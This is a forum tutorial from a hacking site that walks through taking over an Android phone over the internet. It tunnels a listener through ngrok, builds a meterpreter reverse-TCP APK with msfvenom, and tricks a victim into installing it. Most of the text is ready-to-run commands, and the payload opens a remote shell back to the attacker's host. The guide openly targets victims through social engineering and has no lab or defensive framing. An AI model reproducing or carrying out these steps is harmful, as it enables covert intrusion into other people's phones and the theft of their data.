Wonder How ToGadget HacksNext RealityNull Byte
Forum Thread

How to Gain Access to an Android Over WAN

Nov 19, 2017 09:56 PM
636466932034113429.jpg

Android phones are very easy to break into if the victim can be Social Engineered into doing so. If you use Kali, you may have done this but probably in your own network. This guide shows you how to do so but over HTTP tunneling to a phone anywhere in the world.

Load Up Your Kali Shell

Load up your Kali Linux Shell

Download NGROK TCP Tunneling

It can be found here: https://ngrok.com/download. Download the correct architecture for your device.

(This can be found by running 'uname -m')

Then unzip the file with:

unzip "/path-to-ngrok.zip"

Sign Up

The sign up page can be found here: https://ngrok.com/signup. Then run the command to activate your AuthToken

Start an NGROK TCP Server and POSTGRESQL

We can do this with the following command

sudo service postgresql start

./ngrok tcp 4444

This will start a TCP server on port 4444

Make an MSF Payload

First of all, we need to ping the IP of the NGROK TCP site with the following command

ping 0.tcp.ngrok.io

Next we have to generate a Metasploit APK Payload with the following command

msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT= R

> (name of file).apk

The ngrok port is displayed here:

636466949179492790.jpg

Example:

msfvenom -p android/meterpreter/reverse_tcp LHOST=52.15.183.149 LPORT= 8198 R > nullbyte.apk

Start a Listener

Once the Payload is generated we can start a listener. There should be an apk file ready for you to send now.

We can start a listener with this command:

msfconsole

636466955472776398.jpg

Configure the Listener

To start the payload listener, we must now enter these commands:

msf > use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 0.0.0.0

set lport 4444

exploit

Congrats! You have successfully created a payload listener!

636466958887930254.jpg

Send the Payload

Now we must send the payload to the target, I have transferred the file to my android for these purpose

We need to wait for the victim to install the file.

636466963861836482.jpg
636466964229807277.jpg
636466964493555061.jpg
636466963861836482.jpg
636466964229807277.jpg
636466964493555061.jpg

ATTACK!

Now we have access to the android device. Type:

sessions

sessions 1

We can now do many different attacks on the android phone, type

help

to see a variety of attacks to perform

Happy Hacking!

Just updated your iPhone? You'll find new Apple Intelligence capabilities, sudoku puzzles, Camera Control enhancements, volume control limits, layered Voice Memo recordings, and other useful features. Find out what's new and changed on your iPhone with the iOS 18.2 update.

Related Articles

637263493835297420.jpg

How to Use Zero-Width Characters to Hide Secret Messages in Text (& Even Reveal Leaks)

636455706472146367.jpg

How to Hide DDE-Based Attacks in MS Word

Comments

No Comments Exist

Be the first, drop a comment!